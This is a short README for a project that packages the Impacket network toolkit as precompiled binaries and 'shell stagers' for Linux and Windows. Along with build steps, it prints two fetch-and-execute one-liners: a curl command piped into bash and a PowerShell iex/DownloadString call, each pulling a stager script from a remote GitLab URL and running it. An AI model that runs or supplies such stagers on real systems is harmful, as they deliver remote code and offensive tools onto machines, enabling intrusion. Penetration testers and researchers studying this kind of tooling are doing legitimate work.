Requirements to build your own
==============================

Or simply use the precompiled binaries in this repo.

#### Linux
apt install -yq libpcap-dev 
pip install pcapy

Run compile_impacket.py

    python compile_impacket.py

Impacket binaries and shell stagers located in the "bin" directory.

Check each compiled binary if it works properly:

    $ for i in $(\ls *.bin); do ./$i >/dev/null 2>&1; printf "%25s\texit code: %d\n" $i $?; done

##### Stagers

    curl -sSLko- https://gitlab.com/lunar71/compiled_impacket/-/raw/master/bin/linux/impacket_example.py.bin_b64.sh | bash

#### Windows 
Compile pcapy from source:
- WinPcap [here](https://www.winpcap.org/install/default.htm)
- WinPcap Development Resources [here](https://www.winpcap.org/devel.htm) and place in C:\WdpPack
- Build Tools for Visual Studio (2019) at [here](https://visualstudio.microsoft.com/thank-you-downloading-visual-studio/?sku=BuildTools&rel=16)
- Windows 10 SDK (v10.0.19041.0) at [here](https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk/)

Run compile_impacket.py

    python compile_impacket.py

Impacket binaries and ps1 stagers located in the "bin" directory.

##### Stagers 

    iex((New-Object System.Net.WebClient).DownloadString("https://gitlab.com/lunar71/compiled_impacket/-/raw/master/bin/windows/impacket_example.py.exe_b64.ps1"))
